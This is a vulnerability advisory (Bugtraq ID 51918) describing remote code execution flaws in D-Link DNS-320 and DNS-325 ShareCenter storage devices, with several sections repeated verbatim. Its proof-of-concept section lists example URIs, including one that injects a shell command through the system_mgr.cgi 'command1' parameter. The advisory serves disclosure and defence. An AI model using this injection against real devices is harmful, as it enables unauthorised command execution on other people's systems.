D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities
BID:51918
Info
D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities
| Bugtraq ID: | 51918 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 08 2012 12:00AM |
| Updated: | Feb 08 2012 12:00AM |
| Credit: | Roberto Paleari |
| Vulnerable: |
D-Link DNS-325 ShareCenter 0 D-Link DNS-320 ShareCenter 0 |
| Not Vulnerable: | |
Discussion
D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities
D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
The following products are affected:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
The following products are affected:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
Exploit / POC
D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities
The following example URIs are available:
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml
The following example URIs are available:
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml
Solution / Fix
D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities
References:
References: